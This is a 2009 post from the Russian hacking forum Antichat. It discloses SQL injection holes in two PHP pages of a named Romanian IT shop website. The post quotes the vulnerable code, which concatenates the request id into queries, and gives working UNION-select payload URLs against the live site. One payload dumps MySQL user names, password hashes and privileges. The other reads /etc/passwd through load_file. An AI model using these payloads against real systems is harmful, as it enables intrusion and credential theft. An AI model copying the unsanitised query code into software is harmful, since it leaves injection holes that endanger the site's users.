Показать сообщение отдельно

  #284  
Старый 28.12.2009, 22:02
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами: 9285506

Репутация: 1463
По умолчанию

Magazin IT online (Design & Development by Twenty Advertising)
http://www.accessdatamedia.ro
SQL

stiri.php
PHP код:
if(isset($_GET['id']) && ($_GET['id']!=""))
{
    
$where=' WHERE `news`.`id_news`='.$_GET['id'];
}
mysql_select_db($database_conn$conn);
$query_news "SELECT * FROM news ".$where
http://www.accessdatamedia.ro/stiri.php?id=-100+union+all+select+1,concat_ws(0x203a20,version( ),user(),host,user,password,file_priv),3,4+from+my sql.user+--+


certificare.php
PHP код:
$query_news "SELECT * FROM `certifications` where id_certification=".stripslashes($_GET); 
http://www.accessdatamedia.ro/certificare.php?id=-3+union+select+1,2,load_file(0x2f6574632f706173737 764),4+--+
 
Ответить с цитированием